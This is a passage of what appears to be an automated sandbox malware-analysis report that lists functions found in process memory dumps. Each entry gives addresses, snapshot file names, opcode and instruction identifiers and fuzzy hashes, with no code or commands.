                                            • Opcode ID: 388668c51fc12a6ae20e443c199987eaa8a828e0cf34b09dcf798fcf85ac37d7
                                            • Instruction ID: e6af6d7595cf164712a1f97ea95c234b7c2b8a41512fdb1784cf883ee8a86a7b
                                            • Opcode Fuzzy Hash: 388668c51fc12a6ae20e443c199987eaa8a828e0cf34b09dcf798fcf85ac37d7
                                            • Instruction Fuzzy Hash: F2F0E730A1490DCFCF84EF68C848AEE77F1FB68304F00056AA41DD32A4DB30AA60CB80
                                            Function 00007FFD9B8F7360 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6de85d3548e15c8309983118b40b0b7b7bc76d34e62593bb8b20104963ed7655
                                            • Instruction ID: 2116595382c6a1c7573bbd983fbd17015e9d203ba62003b5beac95084216e2ba
                                            • Opcode Fuzzy Hash: 6de85d3548e15c8309983118b40b0b7b7bc76d34e62593bb8b20104963ed7655
                                            • Instruction Fuzzy Hash: 94F0BD3091490DDFDF84EF58C458AEA7BF1FB68305F50419AA41DD3164DB319694CB81
                                            Function 00007FFD9B9026B9 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0147fdf00d539384db28a721c5b8cc302343c5d327775fe450eb807b0e4c0279
                                            • Instruction ID: c8b4d34e22943cdde1879680022f512a8fe94d5178a929a8c1a8d602bc19dae7
                                            • Opcode Fuzzy Hash: 0147fdf00d539384db28a721c5b8cc302343c5d327775fe450eb807b0e4c0279
                                            • Instruction Fuzzy Hash: 21F0DC70A193CD8FDB16AF6488A96E87FB0FF06304F0501EBE458C60E3DA3896448B02
                                            Function 00007FFD9B8FBFED Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e44400a7c5a96269fc6470f281904ef1c3cbdf0aa99c329eda0627eb37d41f9e
                                            • Instruction ID: 44ad2f4e67ff49fb9d3ab82ef17da8c9d91f9a8dc2d594b4604d53b5ef5ccdac
                                            • Opcode Fuzzy Hash: e44400a7c5a96269fc6470f281904ef1c3cbdf0aa99c329eda0627eb37d41f9e
                                            • Instruction Fuzzy Hash: 5601A930A0961DCBEBB8DF44C8987A8B6F5EB58315F1142AAD40D962A0CB746EC4CF41
                                            Function 00007FFD9B8FE1F8 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 126968a45ba1d85892d99b68ad18ab810e465aaef71b1243666ba569e8107e20
                                            • Instruction ID: be9a25ac1d1823ff1ebcbe8cbb19f88f50e9b8614fb6afc88f285be922a8c873
                                            • Opcode Fuzzy Hash: 126968a45ba1d85892d99b68ad18ab810e465aaef71b1243666ba569e8107e20
                                            • Instruction Fuzzy Hash: 10F01D30A0494D9FCF84DF54C454AEA7BF0FF58305F1000AAE41DD3264CB31AA90CB80
                                            Function 00007FFD9B903D20 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90b6a1215da54b8fc7908cf3b2e7059ccd0faba41435843b82e813651aaa039c
                                            • Instruction ID: fd6c35b94761045363da83ab14831a5282258ce8f635ad1af3d02929d9ce90a6
                                            • Opcode Fuzzy Hash: 90b6a1215da54b8fc7908cf3b2e7059ccd0faba41435843b82e813651aaa039c
                                            • Instruction Fuzzy Hash: 9FF01D34914A0D9FDF94DF64C494AEA7BF0FF58305F1000AAE41DD3264DB31A690CB80
                                            Function 00007FFD9B8C0F8D Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9854f2eeb63b12eb081620b9281097075279ea76aee7824dc33730feb321431c
                                            • Instruction ID: 2fce7e24ec8892f0186e02ab1ae13879b9de623eb49879b0c227b7a00f413147
                                            • Opcode Fuzzy Hash: 9854f2eeb63b12eb081620b9281097075279ea76aee7824dc33730feb321431c
                                            • Instruction Fuzzy Hash: B5F0E27091E28C8FDB51EF64C8206EA7BA0FF04700F0500EAE01CC70A2DB38AA64CB41
                                            Function 00007FFD9B8D0642 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0934ad560b8449542cb2b55196bc9e304ac5a04e4d692e7c50adf7ce5416855
                                            • Instruction ID: 3453fe20501622d60f5f989aa3f0c094139690491019100517592e323218c378
                                            • Opcode Fuzzy Hash: f0934ad560b8449542cb2b55196bc9e304ac5a04e4d692e7c50adf7ce5416855
                                            • Instruction Fuzzy Hash: 54F0BD70E6935D8EEB70ABE4D8652BD76A4EF8C701F124676C40E92195DE346A81DA00
                                            Function 00007FFD9B8BF63D Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 629f143f1b4daae93a74c479035a4c980a56276b480b1ac1ed036f430eea196e
                                            • Instruction ID: 8ae40e17e747a2306c934ee77f437581e4619445afc6c4630de76a8750eea74b
                                            • Opcode Fuzzy Hash: 629f143f1b4daae93a74c479035a4c980a56276b480b1ac1ed036f430eea196e
                                            • Instruction Fuzzy Hash: 8CF0A071C1934D9FCB51AF70CD659EA3BB0FF01200F0600A6E819C21A2EA349654CB41
                                            Function 00007FFD9B8BF885 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 833a30481dd4d02dcbb45b1abb482ead2b539a0db29d039e903cb6becbe9299d
                                            • Instruction ID: faf5ca330b620c87ee451c435ffdf2f1680a352b2b62fc4cf22c1a5213a2a1ae
                                            • Opcode Fuzzy Hash: 833a30481dd4d02dcbb45b1abb482ead2b539a0db29d039e903cb6becbe9299d
                                            • Instruction Fuzzy Hash: B0E0D832C4F28D4BD7256B6058651E43B60FF45300F4611B7E048490E3EA6D55588741
                                            Function 00007FFD9B8BCC31 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b16132ee57152ae34f88f8030209556eb11ca085ef0685cf77b005da6786468f
                                            • Instruction ID: dff9901b03ffed2577f9fea596f37c920c70184a898d5ebd50531aa2b440b0b9
                                            • Opcode Fuzzy Hash: b16132ee57152ae34f88f8030209556eb11ca085ef0685cf77b005da6786468f
                                            • Instruction Fuzzy Hash: 35F05E71E1555A8AEBA4DF18C8646FE66B1EF84344F0101F6900D931A6DE342E828F40
                                            Function 00007FFD9B90348A Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ddb301bd646cfc5faafcd321a490b57255de5bbc0eface6f4b13997d4872e92
                                            • Instruction ID: df938c0a78576d380e3c42c6935e5c101d5a3921eb0e02b31d14027dc1a7bf3e
                                            • Opcode Fuzzy Hash: 8ddb301bd646cfc5faafcd321a490b57255de5bbc0eface6f4b13997d4872e92
                                            • Instruction Fuzzy Hash: 79C08C66F1A80D8AFBB0DB284C99BA833E1FF1C300F0202B0948CD3252CE342E42CB40
                                            Function 00007FFD9B8FB489 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ed7ecb291c8b1f3f8a979adbabf607175e437be0cd19d27056505cf12c1810c
                                            • Instruction ID: 13fff3bdf34f332a8cc1a5496e1f56e58e5030dd9aae1ef3265d6782c78783a5
                                            • Opcode Fuzzy Hash: 5ed7ecb291c8b1f3f8a979adbabf607175e437be0cd19d27056505cf12c1810c
                                            • Instruction Fuzzy Hash: B8D09E7090861D8FDBB9DF04C8957A8B6F5EB18300F1000E9A00DD2290CB742BC0CF41

                                            Executed Functions

                                            Function 00007FFD9B8B1A35 Relevance: .4, Instructions: 355COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a2f761e6fc304724bc4683ad237247d39f02b848f6101db3b3be5472d51eba4
                                            • Instruction ID: baaf70ac418a0eab21830742772189d7ba02f5f81465e6a24b356e5956c8fd1c
                                            • Opcode Fuzzy Hash: 8a2f761e6fc304724bc4683ad237247d39f02b848f6101db3b3be5472d51eba4
                                            • Instruction Fuzzy Hash: 71C11471A19A9D8FE755DFA8D8653E97BE1FF19300F04027AD048DB2E6DE792802C781
                                            Function 00007FFD9B8BC4B6 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction ID: 997372f9009a63c9ad7f598c1389db8fbc7eb762067ef3efdd4f08876ec7654a
                                            • Opcode Fuzzy Hash: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction Fuzzy Hash: 7421BF70A1952E8FEF64EF64C8987A976B1FB58300F1101F9C40DA3291CB756B85DF50
                                            Function 00007FFD9B8B0A19 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction ID: e040fa56567607f2f5236a2becd4c564d46d5b2df6dcf1f17a70f40987eba188
                                            • Opcode Fuzzy Hash: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction Fuzzy Hash: AF715711F2EA5E0AF3685ABD08652B976C2DF89B11F26023ED4DFC32E7DC1C69034681
                                            Function 00007FFD9B8B1AFD Relevance: .3, Instructions: 271COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ca559de38e9bc5e167ff7071b0f37b34dbc342aeda8743cc6b0814a0f5d8512
                                            • Instruction ID: 221fe1042eb9cee8b2eb69e2b582eb700be7aef2ecf50304a3b1c96738ae242b
                                            • Opcode Fuzzy Hash: 8ca559de38e9bc5e167ff7071b0f37b34dbc342aeda8743cc6b0814a0f5d8512
                                            • Instruction Fuzzy Hash: F8A1C171A18A4D8FEB98DBA8D8657EC7BE1FF59300F44017AD009D72E6DA792801CB81
                                            Function 00007FFD9B8B0868 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b934b20ce77c5f3c85b4841d7d942232e620aa1da3704928dbf604de98aff20d
                                            • Instruction ID: 7e049416e8c25e147386bde951a10f1598ef7d48bfac4c7f9d15aebc45ae5bc5
                                            • Opcode Fuzzy Hash: b934b20ce77c5f3c85b4841d7d942232e620aa1da3704928dbf604de98aff20d
                                            • Instruction Fuzzy Hash: 9E411831F1DA6C8FD764DB7C88546A97BE1FF5D301B05017EE49AC72A2DE24E8018B81
                                            Function 00007FFD9B8B1295 Relevance: .2, Instructions: 151COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b633e96184d9e0f79d26037f0f154fe8b16c3ee5f6747bc844f98975d3217265
                                            • Instruction ID: 5df0afe096bc8482ca048cf40204caec4b8d54e9651041c7566e6dab6448fd05
                                            • Opcode Fuzzy Hash: b633e96184d9e0f79d26037f0f154fe8b16c3ee5f6747bc844f98975d3217265
                                            • Instruction Fuzzy Hash: CA418071A1895D8FDB48EFA8E855AEDB7A0FF58314F10017BD00DD7296DE346882CB80
                                            Function 00007FFD9B8B12B0 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12314fc56e11f70df20b6a26ace4ab256aab8163f1fc3707ef6a0c29329d8f56
                                            • Instruction ID: 082ad6b909ac5de73f2c86073cd88b1fba2f48d753a8f4a86093734df8a0439b
                                            • Opcode Fuzzy Hash: 12314fc56e11f70df20b6a26ace4ab256aab8163f1fc3707ef6a0c29329d8f56
                                            • Instruction Fuzzy Hash: A0414F71A1491D8FDB58EFA8E855AED77E1FF58315F10017BE40DD3296DE3468818B80
                                            Function 00007FFD9B8B12E8 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 955a67b474788cff6b59188ea4e1b9b46c6652c08ae0f31ace93ec70faed69c1
                                            • Instruction ID: 79c90c5523f25c8f0067638cc65b5649cde33ad82f057687611cd8ac74c80bfb
                                            • Opcode Fuzzy Hash: 955a67b474788cff6b59188ea4e1b9b46c6652c08ae0f31ace93ec70faed69c1
                                            • Instruction Fuzzy Hash: 16410970A14A5D8FDB94EF98D895AEDBBF1FF58301F11017AE409E3295DB34A881CB81
                                            Function 00007FFD9B8B5073 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 476895d704e95ce2126f5b85117f1a3ab8af6374a9216d340f9a934943cf011c
                                            • Instruction ID: 4980cfb80b12e7bdfb679c782952cb7816fc8d8d8545eb7f5c18ac58b476ca1b
                                            • Opcode Fuzzy Hash: 476895d704e95ce2126f5b85117f1a3ab8af6374a9216d340f9a934943cf011c
                                            • Instruction Fuzzy Hash: F541BB74A1852D8FDFA4EF14C864BEDB7B1EB58309F1001EA900EE32A5DB755AC58F81
                                            Function 00007FFD9B8B0838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1929b5819835b65a0ae654f6ccc0e21ea8f419654ab1bec7c78988badb1983ff
                                            • Instruction ID: 2f3ddbd7fdd8e2e1fb00e4e34d2a44e56eaf798f36a66a2b2e7ea027788c99d4
                                            • Opcode Fuzzy Hash: 1929b5819835b65a0ae654f6ccc0e21ea8f419654ab1bec7c78988badb1983ff
                                            • Instruction Fuzzy Hash: 8D217F32A1D3A84ED725B77C68594EF3FE0EF4A229B04027FE4D9C2193DE20904687C1
                                            Function 00007FFD9B8B1575 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b67229bf13f57920e826cc1cb07dade7f839ddababcf82b2c04e60971179061
                                            • Instruction ID: 931e4418bbf56fb275bcd61abef4d5767164a7d1cd8f6879841743a70691645f
                                            • Opcode Fuzzy Hash: 2b67229bf13f57920e826cc1cb07dade7f839ddababcf82b2c04e60971179061
                                            • Instruction Fuzzy Hash: E8312531B1D69E8BD711BBB8CC216E9B7B0EF56310F054177D025C71D2DA3866068B92
                                            Function 00007FFD9B8B5193 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c2992d99fc96a6350cb72ccc14103604baaebd9cddfc94dbb1be1a240dd75aa
                                            • Instruction ID: 3126136b5c4134977df317eaf176448b41176d476c85e1ef7beff587cef214e3
                                            • Opcode Fuzzy Hash: 7c2992d99fc96a6350cb72ccc14103604baaebd9cddfc94dbb1be1a240dd75aa
                                            • Instruction Fuzzy Hash: 96318E35A1851D8FDF94EF14C865AEDB7B1FB64305F1001EA900EE32A5DB715A818F81
                                            Function 00007FFD9B8B1588 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b6e04b4c819a432461ef48a988ee830a16297083f4153e054eea93f5a9e29b0
                                            • Instruction ID: d7bb788f6fb727c6fc3ba4e69692875e9b8b759da93a299f8289204ec5c4837a
                                            • Opcode Fuzzy Hash: 1b6e04b4c819a432461ef48a988ee830a16297083f4153e054eea93f5a9e29b0
                                            • Instruction Fuzzy Hash: C1110832B1D69E8FD702B7B8CC215E97770EB43311F0945B3D051CB1D2DA34621A8B92
                                            Function 00007FFD9B8B070D Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f3026cfc4ec5876e3f77ff4a50ad8f92277a26910de4d2c5e3f1dfeda3ffaec
                                            • Instruction ID: 9e054c1d6dbb54576dee64b1da8cd8774a023870a1b2e526c0cc58ba5587eee4
                                            • Opcode Fuzzy Hash: 8f3026cfc4ec5876e3f77ff4a50ad8f92277a26910de4d2c5e3f1dfeda3ffaec
                                            • Instruction Fuzzy Hash: 26115E70E2950E9AEB61FFE898596FDB7E0FF18704F110477E41CC21A4DE3862948A81
                                            Function 00007FFD9B8B1598 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bea534291ddd2d63c44c9c404e67e8befc46149196122322c37fe6c4680e1304
                                            • Instruction ID: c01f8ecead992f414a46f8cfff08de5c060ab7545d19324280a68e6eba8aa821
                                            • Opcode Fuzzy Hash: bea534291ddd2d63c44c9c404e67e8befc46149196122322c37fe6c4680e1304
                                            • Instruction Fuzzy Hash: 9811E531A1E69E8FD712ABB4CC205EA7B70EB47310F0946B3D011CB1E2DA386619CB91
                                            Function 00007FFD9B8B15A0 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ab3c8905662aa6d33b5467a7573835f556b018ca7f1fe4d00f8c094acf67d64
                                            • Instruction ID: b075836b43be507d191724f73762c85edb46660662d651176e26ced598a949aa
                                            • Opcode Fuzzy Hash: 6ab3c8905662aa6d33b5467a7573835f556b018ca7f1fe4d00f8c094acf67d64
                                            • Instruction Fuzzy Hash: 8401D631E1E69A8FD712A7B4CC245EA7B70EF07310F0946A3D011CB1E6DE386615CB91
                                            Function 00007FFD9B8B0730 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8aba62ac96dfd5c256fd12236cc73c3cfdbf0c200219407f1ef0ea0d01e435e6
                                            • Instruction ID: bc4597ad5e9d69bdc1633f4aee62fb7cb72d8758a3867bacdbe04bc80a32ad76
                                            • Opcode Fuzzy Hash: 8aba62ac96dfd5c256fd12236cc73c3cfdbf0c200219407f1ef0ea0d01e435e6
                                            • Instruction Fuzzy Hash: 44F01C7091590E9FDB90FFA8C8596FE7BE0FF58305F11057AE81CC21A4DA34A6A4CB81
                                            Function 00007FFD9B8B1745 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 482f46616c8a6a6aa14d72a80944ba7020efb826d907762607f1f3013e7c7d8d
                                            • Instruction ID: 576209a028c0e91b6daa014da4b0f7417e4a81583b20f13fd7d84aadf086d334
                                            • Opcode Fuzzy Hash: 482f46616c8a6a6aa14d72a80944ba7020efb826d907762607f1f3013e7c7d8d
                                            • Instruction Fuzzy Hash: 1CF01C74A2950DDBDB64FBA8E911AEA77A0EF04344F000076E41DC3195DA34A665DB91

                                            Executed Functions

                                            Function 00007FFD9B891A35 Relevance: .4, Instructions: 361COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
